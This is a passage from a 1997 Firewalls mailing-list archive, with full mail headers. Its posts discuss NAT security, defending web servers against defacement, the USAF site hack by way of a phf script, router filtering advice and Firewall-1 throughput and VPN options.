>---------- >From: Carl Karlsson[SMTP:ckn@findata.se] >Sent: Friday, January 03, 1997 11:43 AM >To: 'Firewalls Mailing List' >Subject: RE: NT NAT > > >On Fri, 3 Jan 1997, Russ wrote: > >> You got anything intelligent to say on just why you think NAT offers ANY >> SECURITY AT ALL??? I can't wait to hear it. I mean ANY SECURITY AT ALL. > >I'd like to know if and why this means that masquerading one's network >behind a 'secured' host doesn't provide any added security from just >connecting the network straight out? Or am I missing something here (not >unusual :)? >I was under the impression that if I use some box (Linux with TIS fwtk for >example, or that NT box perhaps?) masquerading my network and using >192.168.x.x-addresses inside, I would be at least a little bit more secure >than if had all my w95/nt/unix machines directly connected to the >internet? A hacker will know if those machines are there or not... Most people who don't know too much about the net wouldn't think anything of there possibly being more machines behind the firewall... however, hackers will.. I suppose you could toss this under the 'security through obscurity' theme, but.... time has taught us that doesn't work. Hackers are very curious beings and will find just about anything, no matter how well you think you've hidden it. Machines that are masqueraded? That's nothing. The people that wouldn't even think about anything being hidden that way wouldn't be able to hack the machines anyway. That's my opinion anyhow, and I'll stick to it. >(Not talking super-secure here, not flaming anyone, but just interested! >Pointers do nicely if this is already well-known...) No, not talking super secure.... but that's the type of security that the only people that would be fooled wouldn't know how to hack those hidden machines anyway. From firewalls-owner Tue Jan 7 13:10:15 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA05838 for firewalls-outgoing; Tue, 7 Jan 1997 12:15:15 -0800 (PST) Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA05831 for ; Tue, 7 Jan 1997 12:15:06 -0800 (PST) From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7.1/res.host.cf-4.0) with ESMTP id PAA29320; Tue, 7 Jan 1997 15:14:00 -0500 (EST) sender long-morrow@CS.YALE.EDU for Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7.1/res.client.cf-4.0) id PAA27798; Tue, 7 Jan 1997 15:13:54 -0500 (EST) Date: Tue, 7 Jan 1997 15:13:54 -0500 (EST) Message-Id: <199701072013.PAA27798@SPARKY.CF.CS.YALE.EDU> To: firewalls@greatcircle.com, oconnor@reston.ans.net Subject: Re: Web Site Hacking Cc: Steve@hon.com, eric@nova.dcrt.nih.gov Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Today's Washington Post had a brief article regarding the ForceField product >from TIS which is apparently intended to address this issue. Unfortunately >you have to register to find out anything specific about the package, e.g. >which OS it replaces/augments. They do tell you the price however :-). I've >registered but the implication is that the more specific information will >be sent surface mail. According to the TIS Web page on Gauntlet ForceField ( http://www.tis.com/docs/products/gauntlet/forcefield/index.html ) if you register they will give you a free evaluation copy of the software available in January. - Morrow From firewalls-owner Tue Jan 7 13:18:26 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA06434 for firewalls-outgoing; Tue, 7 Jan 1997 12:30:53 -0800 (PST) Received: from www.biella.alpcom.it (www.biella.alpcom.it [194.243.65.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id MAA06424 for ; Tue, 7 Jan 1997 12:30:24 -0800 (PST) Received: from ferraris.biella.alpcom.it by www.biella.alpcom.it; (5.65v3.2/1.1.8.2/05Mar96-0237PM) id AA23604; Tue, 7 Jan 1997 21:30:06 +0100 Message-Id: X-Mailer: XFMail 1.0 [p0] on Linux Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Mime-Version: 1.0 In-Reply-To: <199612312101.NAA17474@miles.greatcircle.com> Date: Mon, 06 Jan 1997 16:53:57 +0100 (MET) Organization: ENTE NAZIONALE DI DERATTIZZAZIONE From: Andrea Ferraris To: uskanbye@ibmmail.com Subject: Re: Air Force Web Site Hacked Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >I have not set one up yet(Planned for July), but I believe you can have >a totally CDROM machine, at least using Novell or NT. Bootable CDROMs >and all data on CDROM so you would not have any writable media. You could use - maybe - Linux from Caldera too. Some months ago, they worked on booting systems from CDROM with Adaptec 2940 controllers. But I can't figure out what can be the use of a diskless server. I think also that you must get more RAM because the lack of disk space where swapping . In any case You shouldn't take in most consideration my thoughts because I'm not an expert. Regards, Andrea ---------------------------------- E-Maill: Andrea Ferraris Date: 06-Jan-97 Time: 16:53:57 This message was sent by XFMail ---------------------------------- From firewalls-owner Tue Jan 7 13:22:14 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA06433 for firewalls-outgoing; Tue, 7 Jan 1997 12:30:49 -0800 (PST) Received: from pecos-int.iphase.com (pecos.iphase.com [157.175.3.200]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id MAA06416 for ; Tue, 7 Jan 1997 12:30:21 -0800 (PST) Received: by pecos-int.iphase.com; id AA04950; Tue, 7 Jan 97 14:30:03 CST Received: from rio.iphase.com(157.175.2.200) by pecos.iphase.com via smap (3.2) id xma004947; Tue, 7 Jan 97 14:29:58 -0600 Received: by rio.iphase.com; id AA20501; Tue, 7 Jan 97 14:29:56 CST Received: from chip (chip-fddi.iphase.com) by que.iphase.com.iphase.com (4.1/SMI-4.1) id AA06653; Tue, 7 Jan 97 14:29:55 CST Message-Id: <32D2B242.167EB0E7@iphase.com> Date: Tue, 07 Jan 1997 14:29:54 -0600 From: Patrick Larkin Jr Organization: Interphase Corporation X-Mailer: Mozilla 3.0 (X11; I; SunOS 4.1.3 sun4c) Mime-Version: 1.0 To: firewalls@greatcircle.com Subject: [Fwd: Re: Web Site Hacking] Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Steve wrote: > > Eric K. Dickinson wrote: > > > > I am wondering if this is a suitable solution. Could one not set up a passive > > defence by over writing the presented home-pages at a predeterminded time and > > at some other trigger such as a write or copy. Any unauthorized action could > > also be used as a trigger to just "over write". The real home-page coud be > > anywhere accessable only by the OS itself or another hardened location not > > presented to the world. I am used to the Unix world and have more experience > > there than NT. > > > > Any Ideas? Thoughts? Or is this out in let field? > > > > eric@nova.dcrt.nih.gov > > Eric, > > A very interesting thought..but firewalls are supposed to prevent users > from being able to tamper in the first place. But, I for one am going > to give that more serious consideration as I see its possibilities for > use on maybe another machine on the LAN to check on the status of say a > web server. Thanks for the idea.. > > Steve > Steve@hon.com > sdg consulting 2 things: 1. I disagree with the statement about firewalls.... some find it more palatable to put the web server OUTSIDE the firewall and not let ANYONE through 2. the idea of re-writing the files regularly on the web server is a good one.... we do something similar to 'rdist's binary compare and unconditionally re-write that which differes from the "master" copy stored well within our security perimeter. We also ascribe to 1 above and do NOT trust our web server in anyway.... if it's crashed, we know it quickly, restore from a recent backup, and go on with our lives. -- [~]========================================================================[~] | Patrick Larkin Jr. Systems Administrator | | Ah, but Unix IS a User Friendly OS! It's just picky about its friends! | [_]========================================================================[_] From firewalls-owner Tue Jan 7 13:27:47 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA07522 for firewalls-outgoing; Tue, 7 Jan 1997 12:58:39 -0800 (PST) Received: from ginger.vnet.net (ginger.vnet.net [166.82.1.69]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA07515 for ; Tue, 7 Jan 1997 12:58:29 -0800 (PST) Received: from elvis.vnet.net (elvis.vnet.net [166.82.1.5]) by ginger.vnet.net (8.8.2/8.8.2) with ESMTP id QAA18613 for ; Tue, 7 Jan 1997 16:05:48 -0500 Received: from sdg (galip.vnet.net [166.82.174.200]) by elvis.vnet.net (8.8.4/8.8.4) with SMTP id NAA20669 for ; Tue, 7 Jan 1997 13:15:10 -0500 (EST) Message-ID: <32D2913C.91E@hon.com> Date: Tue, 07 Jan 1997 13:12:49 -0500 From: Steve Reply-To: Steve@hon.com Organization: sdg consulting X-Mailer: Mozilla 3.01Gold (WinNT; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: To Firewall or Not to Firewall? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk HI, I have been viewing this list for several weeks now and it seems that the general consenus is that a firewall is needed in ALL cases. What I am wondering is what if the only connection to the Internet is a Website? And what if the WebSite software has its own built-in security such as O'Reiley's WebSite does? Is a firewall _still_ necessary? Thanks for any responses..I would hope that others would be wondering this also, not just myself, and any responses would benefit many. Steve Steve@hon.com sdg consulting From firewalls-owner Tue Jan 7 14:35:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA10449 for firewalls-outgoing; Tue, 7 Jan 1997 13:57:43 -0800 (PST) Received: from hidata.com (hidata.com [205.158.61.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA10442 for ; Tue, 7 Jan 1997 13:57:32 -0800 (PST) Received: by hidata.com; id AA29310; Tue, 7 Jan 97 13:57:15 PST Received: from oscntsrv.hidata.com(205.158.60.100) by hds-gw.hidata.com via smap (3.2) id xma029308; Tue, 7 Jan 97 13:57:08 -0800 Received: by oscntsrv.hidata.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFCA2.8B7D3240@oscntsrv.hidata.com>; Tue, 7 Jan 1997 13:56:13 -0800 Message-Id: From: "Stout, Bill" To: "'Firewall List'" Subject: Multi-FW Gateway management GUI Date: Tue, 7 Jan 1997 13:56:12 -0800 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm collecting basic requirements for FW-farm management applications for an internal instructional document. What I've thought of so far is the following: 1. An initial GUI which allows an administrator to view multiple gateways, ports, alert status, and proxy states. 2. The ability to select a proxy and view configuration information on that proxy on a specific gateway. 3. The ability to delegate departmental security. 4. The ability to manage individual user authentication per proxy. 5. The ability to centrally view logs. 6. The ability to send pages on specific events. 7. If located on the same DMZ subnet as the gateways, the ability to sniff packets and graphically organize them, other basic network management monitoring. 8. A sanity-check utility which looks for obvious proxy filter configuration errors. 9. A tripwire utility to display alerts on file and process state changes. 10. 'Courtney' for farms? 11. Instant traceback utility to collect suspicious host information (DNS data, traceroute, whois, traffic type, etc). 12. Time synchronization verification for accurate log comparisons. 13. Strongly encrypted and authenticated administrative channels. 14. Load balancing? Comments? Which are overkill and which should I add? Bill Stout From firewalls-owner Tue Jan 7 16:32:27 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA17938 for firewalls-outgoing; Tue, 7 Jan 1997 16:08:58 -0800 (PST) Received: from unix1.sysnet.net (unix1.sysnet.net [206.142.32.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id QAA17890 for ; Tue, 7 Jan 1997 16:08:36 -0800 (PST) Received: from [206.142.16.35] (bppp1.sysnet.net [206.142.16.35]) by unix1.sysnet.net (8.8.4/8.6.12) with SMTP id UAA14304 for ; Tue, 7 Jan 1997 20:36:39 -0500 (EST) Message-Id: <199701080136.UAA14304@unix1.sysnet.net> Subject: USAF: how it was hacked Date: Tue, 7 Jan 97 19:09:39 -0400 x-sender: patton@mail.sysnet.net x-mailer: Claris Emailer 1.1 From: Matthew Patton To: Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk No, this isn't about cdrom based web content. Really quite anticlimatic. The infamous phf script was left active on the server and was how they got in. Root, the whole 9 yards. What's really funny is that no more than a week prior to the incident, I suggested to ASSIST (the military's equiv of CERT, and now financial sponsor of same) that in light of the minor poking around I did on a handful of military web sites, that they needed to get the word out to admins because so many servers were in a high state of misconfiguration and just waiting to be exploited. 7 days later, boom!! I'm not sure on what grounds people place so much trust in the military to do things right with respect to host and network security. I'm sure there are segments that do a damn fine job, but seeing the abject lack of skills and knowledge in the Pentagon area makes me a mite bit skeptical and not a little ashamed. It's a wonder we don't see high profile exploits on a routine basis. Don't get me wrong, the private sector doesn't have their act together on many fronts as well. Now hopefully the thread can die in peace. From firewalls-owner Tue Jan 7 17:29:31 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA22531 for firewalls-outgoing; Tue, 7 Jan 1997 17:10:01 -0800 (PST) Received: from mailsorter-1.alma.webtv.net (mailsorter-1.isp.alma.webtv.net [205.180.153.85]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id RAA22524 for ; Tue, 7 Jan 1997 17:09:53 -0800 (PST) Received: from mailtod-1.alma.webtv.net (mailtod-1.iap.alma.webtv.net [207.76.180.81]) by mailsorter-1.alma.webtv.net (8.7.5/8.7.3) with ESMTP id RAA24170; Tue, 7 Jan 1997 17:09:32 -0800 (PST) Received: (from production@localhost) by mailtod-1.alma.webtv.net (8.7.5/8.7.3) id RAA28245; Tue, 7 Jan 1997 17:09:33 -0800 (PST) Message-Id: <199701080109.RAA28245@mailtod-1.alma.webtv.net> From: bigal1@webtv.net (Alfred Lipschitz) Date: Tue, 7 Jan 1997 20:09:33 -0500 To: firewalls@GreatCircle.COM Subject: New Party Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-Transfer-Encoding: 7BIT MIME-Version: 1.0 (WebTV 1.0) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk They contacted , when I respond I get garrabe back. Tell them to call me 609-264-0311.Thanks, I appreciate it. El Producto From firewalls-owner Tue Jan 7 17:53:30 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA23322 for firewalls-outgoing; Tue, 7 Jan 1997 17:23:23 -0800 (PST) Received: from elm.ncs.com.sg (elm.ncs.com.sg [203.116.16.17]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id RAA23283 for ; Tue, 7 Jan 1997 17:22:58 -0800 (PST) Received: from Henry.ncs.com.sg (thunder.ncs.com.sg [203.116.16.66]) by elm.ncs.com.sg (8.7.3/8.7.3) with SMTP id JAA26643; Wed, 8 Jan 1997 09:08:41 +0800 (SGT) Message-ID: <32D2F4C6.5DA5@ncs.com.sg> Date: Wed, 08 Jan 1997 09:13:42 +0800 From: Henry Lim Chee Wee Organization: National Computer Systems Pte Ltd X-Mailer: Mozilla 3.0Gold (Win95; I) MIME-Version: 1.0 To: Steve@hon.com CC: firewalls@GreatCircle.COM Subject: Re: To Firewall or Not to Firewall? References: <199701080101.JAA26202@elm.ncs.com.sg> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Steve once wrote: > > > > HI, > > > > I have been viewing this list for several weeks now and it seems that > > the general consenus is that a firewall is needed in ALL cases. What I > > am wondering is what if the only connection to the Internet is a > > Website? And what if the WebSite software has its own built-in security > > such as O'Reiley's WebSite does? Is a firewall _still_ necessary? > > Thanks for any responses..I would hope that others would be wondering > > this also, not just myself, and any responses would benefit many. > > > > Steve > > Steve@hon.com > > sdg consulting IMHO, a firewall is necessary as long as you are not running a standalone web server with sole access to the Internet. O'Reiley's WebSite is an application program running over a largely insecure OS platform that will still allow the purposeful prankster to ruin your show for a laugh. The word 'secure', as I looked at it, is history. Anything considered secured now is relative to the lack or gain of technology and information. And then there is the bugs...... Firewall may not be some screening that you will like, especially when the industry is oddly shifting to the WindowsNT platform. But it will still reduce the odds that a would-be hacker making curtain calls to your website/LAN and provides a misinformed peace of mind to your company's MIS. But if you don't like firewalls, try reducing the number of active ports to the minimal necessity, and delete a whole lot of interesting executables. Security in a networking environment, afterall, means inconveniences. -- _ 0 (_| |(_~|^~~| "I-dare-you geysering forth with TT/_ T"T heartacious good will" ^^^^^^^^^^^^^^nitro ^^^^^^^^^^^^^ ææææææææ Flames > /dev/null ææææææææ From firewalls-owner Tue Jan 7 18:35:26 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA27488 for firewalls-outgoing; Tue, 7 Jan 1997 18:14:35 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id SAA27370 for firewalls@greatcircle.com; Tue, 7 Jan 1997 18:14:11 -0800 (PST) Received: from relay7.UU.NET by ascb.saturnm.rosmail.com with ESMTP id HAA23178; (8.8.4/vak/1.9) Tue, 7 Jan 1997 07:32:43 +0300 (MSK) Received: from miles.greatcircle.com by relay7.UU.NET with ESMTP (peer crosschecked as: miles.greatcircle.com [198.102.244.34]) id QQbxkk04152; Mon, 6 Jan 1997 23:30:40 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA05177 for firewalls-outgoing; Mon, 6 Jan 1997 15:45:00 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id PAA05158 for firewalls@greatcircle.com; Mon, 6 Jan 1997 15:44:49 -0800 (PST) Received: from mtymail.avantel-icom.com.mx ([200.33.228.147]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA26523 for ; Fri, 3 Jan 1997 07:20:42 -0800 (PST) Received: by mtymail.avantel-icom.com.mx with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBF957.1EE0F1B0@mtymail.avantel-icom.com.mx>; Fri, 3 Jan 1997 09:18:45 -0600 Message-ID: From: Ricardo Alvarado To: "firewalls@GreatCircle.COM" Subject: Re: internal filtering router - filter config? Date: Fri, 3 Jan 1997 09:20:46 -0600 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >What type of things would you filter on the internal router? or even >the external router? I am going to be installing a firewall real soon >and would really appreciate any help. > >-steve. >matkoski@dreamscape.com In your external router you'd block any ICMP traffic going back and forth, as well as any packets bearing one of your internal IP addresses, as a source address, especially if these are going INTO your protected network. Also, kill telnets, fingers, snmp and snmp trap. Actually, kill any ports that your users will not be using, andl leave just mail, web, ftp, etc. ricardo ralvarado@avantel.com.mx From firewalls-owner Tue Jan 7 18:40:41 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA28048 for firewalls-outgoing; Tue, 7 Jan 1997 18:20:20 -0800 (PST) Received: from gargoyle.clark.net (pa1dsp14.dcwt.infi.net [208.136.65.38]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id SAA28020 for ; Tue, 7 Jan 1997 18:20:05 -0800 (PST) Received: by gargoyle.clark.net (Smail3.1.29.1 #2) id m0vhneH-000EzZC; Tue, 7 Jan 97 21:21 EST Date: Tue, 7 Jan 1997 21:21:49 -0500 (EST) From: "Paul D. Robertson" X-Sender: proberts@gargoyle To: Wilner@DOCKMASTER.NCSC.MIL cc: firewalls@GreatCircle.COM Subject: Re: Re: NCSA != NCSC In-Reply-To: <970107195334.971794@DOCKMASTER.NCSC.MIL> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 7 Jan 1997 Wilner@DOCKMASTER.NCSC.MIL wrote: > Everything except boot-up depends upon the O/S. Nothing is below the "O/S > layer," nor does one speak of such a layer unless one intends "application Hrm, I'd always considered monitor PROMs to be 'below' the OS since it's unaware of the PROM code runing, has no control of the machine at that point, is still loaded in memory, and can be manipulated without it's own consent. Hardware debuggers have also always fallen in this category, in my view. Depending on the OS, there can be software, hardware, or firmware memory management operating "under" the OS, especially if that OS is running in a virtual machine, or some other bounded "sandbox", "the OS" doesn't always mean "the *only* OS". > layer" and doesn't know an application from an O/S, nor can a single byte be > sent or retrieved over a device (networked or otherwise) unless an O/S is > relied upon, nor can a single access to memory, disk, or what-have-you be Hmm, that's funny, the PROMs in my Suns seem quite happy to access the console device without Solaris'/SunOS' knowledge. MVS also seemed quite happy running under VM last time I did it, and the controlling OS in the 'OS' stack seemed quite happy to go right up against the real and virtual devices without MVS' say so. Certainly from an MVS applications standpoint things were running 'below' the OS. > performed by networking code "below the O/S layer," as we so quaintly say, > if there is no O/S involved. And many OS' rely on firmware code layered beneath them to access the actual devices. No reason you couldn't do the same for CPU, masking the OS, and it's applications to some subset of the machine, and enforcing memory, instruction, or device protection. > Gentlemen, if this represents your understanding of operating systems and > security, please contribute to alt.brush-sellers, not to firewalls. Care for a broom to ride out on? Paul ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts@clark.net which may have no basis whatsoever in fact." PSB#9280 From firewalls-owner Tue Jan 7 19:44:09 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA03463 for firewalls-outgoing; Tue, 7 Jan 1997 19:33:55 -0800 (PST) Received: from mercury.Sun.COM (mercury.Sun.COM [192.9.25.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id TAA03428 for ; Tue, 7 Jan 1997 19:33:34 -0800 (PST) Received: from Singapore.Sun.COM ([129.158.71.3]) by mercury.Sun.COM (SMI-8.6/mail.byaddr) with SMTP id TAA08753; Tue, 7 Jan 1997 19:33:13 -0800 Received: from rufus.Singapore.Sun.COM by Singapore.Sun.COM (SMI-8.6/SMI-5.3) id LAA06972; Wed, 8 Jan 1997 11:36:44 +0800 Received: from pacifica.Singapore.Sun.COM by rufus.Singapore.Sun.COM (SMI-8.6/SMI-SVR4) id LAA10173; Wed, 8 Jan 1997 11:29:56 +0800 Received: by pacifica.Singapore.Sun.COM (SMI-8.6/SMI-SVR4) id LAA07851; Wed, 8 Jan 1997 11:34:24 +0800 Date: Wed, 8 Jan 1997 11:34:24 +0800 From: David.Wee@Singapore.Sun.COM (David Wee) Message-Id: <199701080334.LAA07851@pacifica.Singapore.Sun.COM> To: drexx@sunphil.mozcom.com Subject: Re: FW-1 throughput? Etc. Cc: firewalls@greatcircle.com X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ----- Begin Included Message ----- From julie.gupta@Eng Tue Jan 7 02:50:29 1997 Date: Mon, 6 Jan 1997 10:56:25 -0800 From: julie.gupta@Eng (Julie Gupta) To: David.Wee@Singapore Subject: Re: FW-1 throughput? Etc. Cc: elizabeth.purcell@Eng David, As for the second question, FW-1 2.1 does have a VPN add-on module. Please check the pricelist. SunScreen EFS is also a software solution that provides VPN capability. There is a positioning document on the web on when to use one over the other. They are competitive products. Hope this helps, Julie > From David.Wee@Singapore Sun Jan 5 23:55:38 1997 > Date: Mon, 6 Jan 1997 15:53:50 +0800 > From: David.Wee@Singapore (David Wee) > To: julie.gupta@Corp > Subject: FW-1 throughput? Etc. > Cc: David.Wee@Singapore > > Julie, > > > Can you please help answer 1 & 2 > > > Regards,david > ----- Begin Included Message ----- > > From drexx@sunphil.mozcom.com Mon Jan 6 15:45:31 1997 > Date: Mon, 6 Jan 1997 15:46:44 -0800 > From: drexx@sunphil.mozcom.com (Dexter D. Laggui) > To: firewalls@greatcircle.com, dwee@Singapore > Subject: FW-1 throughput? Etc. > > Hello world, > > I would be very much obliged if anybody can please answer on this: > > 1] How many packets per second can the Solstice Firewall-1 2.1 > (installed in a Sun Sparcstation 20 with Solaris 2.5) > process ? In mbps terms? > 2] Current needs dictate for a solution involving FWs with multiple > secure VPNs to mobile customers. I like the capabilties of > FW-1 2.1 very much but I understand that it does not support VPN > today. Do I need the SunScreen to complement it? :-( > 3] Who do I talk to in Sun Singapore for FW and SunScreen training? > What is the mailing list for Checkpoint/Solstice Firewall-1 users? > > Thank you very much for your kindness. :-) > > Yours, > Dexter D. Laggui > Systems Engineer > > drexx@sunphil.mozcom.com > Philippine Systems Products Inc. > > > ----- End Included Message ----- > > ----- End Included Message ----- From firewalls-owner Tue Jan 7 19:48:45 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA01790 for firewalls-outgoing; Tue, 7 Jan 1997 19:09:19 -0800 (PST) Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA01728 for ; Tue, 7 Jan 1997 19:08:24 -0800 (PST) Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0vhoMt-0004FbC (Debian Smail-3.2 1996-Jul-4 #2); Wed, 8 Jan 1997 04:07:55 +0100 (MET) Received: from lina (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Wed, 8 Jan 97 04:07 MET Received: by lina id m0vhoJh-0004j2C (Debian Smail-3.2 1996-Jul-4 #2); Wed, 8 Jan 1997 04:04:37 +0100 (MET) Message-Id: From: lists@lina.inka.de (Bernd Eckenfels) Subject: Re: To Firewall or Not to Firewall? To: Steve@hon.com Date: Wed, 8 Jan 1997 04:04:36 +0100 (MET) Cc: firewalls@GreatCircle.COM In-Reply-To: <32D2913C.91E@hon.com> from "Steve" at Jan 7, 97 01:12:49 pm X-Mailer: ELM [version 2.4 PL25 PGP2] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, > I have been viewing this list for several weeks now and it seems that > the general consenus is that a firewall is needed in ALL cases. Not realy. > What I > am wondering is what if the only connection to the Internet is a > Website? Its safe enough to place a packet filter in front of the server (in your ISP access router). But it is then important that there is no net connection to internal hosts. This means all html files need to be uploaded by disk, locally edited or via the net (if you are so daring to allow that method). You will very fast need to connect you bureaulan to the web server, or to the internet for WWW Surfing. Then you might consider using a firewall or a statefull NAT Box with outgoing only connections. Greetings Bernd From firewalls-owner Tue Jan 7 19:59:33 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA03387 for firewalls-outgoing; Tue, 7 Jan 1997 19:32:45 -0800 (PST) Received: from mercury.Sun.COM (mercury.Sun.COM [192.9.25.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id TAA03377 for ; Tue, 7 Jan 1997 19:32:33 -0800 (PST) Received: from Singapore.Sun.COM ([129.158.71.3]) by mercury.Sun.COM (SMI-8.6/mail.byaddr) with SMTP id TAA08433; Tue, 7 Jan 1997 19:31:49 -0800 Received: from rufus.Singapore.Sun.COM by Singapore.Sun.COM (SMI-8.6/SMI-5.3) id LAA06942; Wed, 8 Jan 1997 11:35:18 +0800 Received: from pacifica.Singapore.Sun.COM by rufus.Singapore.Sun.COM (SMI-8.6/SMI-SVR4) id LAA10155; Wed, 8 Jan 1997 11:28:31 +0800 Received: by pacifica.Singapore.Sun.COM (SMI-8.6/SMI-SVR4) id LAA07848; Wed, 8 Jan 1997 11:32:59 +0800 Date: Wed, 8 Jan 1997 11:32:59 +0800 From: David.Wee@Singapore.Sun.COM (David Wee) Message-Id: <199701080332.LAA07848@pacifica.Singapore.Sun.COM> To: drexx@sunphil.mozcom.com Subject: Re: FW-1 throughput? Etc. Cc: firewalls@greatcircle.com X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ----- Begin Included Message ----- From elizabeth.purcell@Eng Tue Jan 7 04:10:59 1997 Date: Mon, 6 Jan 1997 12:10:23 -0800 From: elizabeth.purcell@Eng (Elizabeth Purcell) Subject: Re: FW-1 throughput? Etc. Cc: julie.gupta@Eng, elizabeth.purcell@Eng To: David.Wee@Singapore Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-MD5: WJzJXeXl2piZpiPHTTfjYQ== David, I have firewall throughput information at the url http://netrai4.eng/firewall/firewall.results.new.html. The results were measured on an Ultra 2/2170 with SunSwift network adaptors (100BaseT) at half duplex. Notice that the cpu utilization for the workstations with the firewalls installed did not come close to saturation. Looking at the SPEC95 info at the url, http://perfwww.eng/tasks/results/spec95, a ss20/71 is about half the cpu performance of a Ultra 2/2170. Hope that this helps. Let me know.. Elizabeth > From gupta@gupta Mon Jan 6 10:49:57 1997 > Date: Mon, 6 Jan 1997 10:56:25 -0800 > From: gupta@gupta (Julie Gupta) > To: David.Wee@Singapore > Subject: Re: FW-1 throughput? Etc. > Cc: elizabeth.purcell@Eng > > Elizabeth, > > Can you help David with his first question? > > Thanks. > > ------------------------------------------- > David, > > As for the second question, FW-1 2.1 does have a VPN add-on module. > Please check the pricelist. SunScreen EFS is also a software solution > that provides VPN capability. There is a positioning document on the > web on when to use one over the other. They are competitive products. > > Hope this helps, > Julie > > > From David.Wee@Singapore Sun Jan 5 23:55:38 1997 > > Date: Mon, 6 Jan 1997 15:53:50 +0800 > > From: David.Wee@Singapore (David Wee) > > To: julie.gupta@Corp > > Subject: FW-1 throughput? Etc. > > Cc: David.Wee@Singapore > > > > Julie, > > > > > > Can you please help answer 1 & 2 > > > > > > Regards,david > > ----- Begin Included Message ----- > > > > From drexx@sunphil.mozcom.com Mon Jan 6 15:45:31 1997 > > Date: Mon, 6 Jan 1997 15:46:44 -0800 > > From: drexx@sunphil.mozcom.com (Dexter D. Laggui) > > To: firewalls@greatcircle.com, dwee@Singapore > > Subject: FW-1 throughput? Etc. > > > > Hello world, > > > > I would be very much obliged if anybody can please answer on this: > > > > 1] How many packets per second can the Solstice Firewall-1 2.1 > > (installed in a Sun Sparcstation 20 with Solaris 2.5) > > process ? In mbps terms? > > 2] Current needs dictate for a solution involving FWs with multiple > > secure VPNs to mobile customers. I like the capabilties of > > FW-1 2.1 very much but I understand that it does not support VPN > > today. Do I need the SunScreen to complement it? :-( > > 3] Who do I 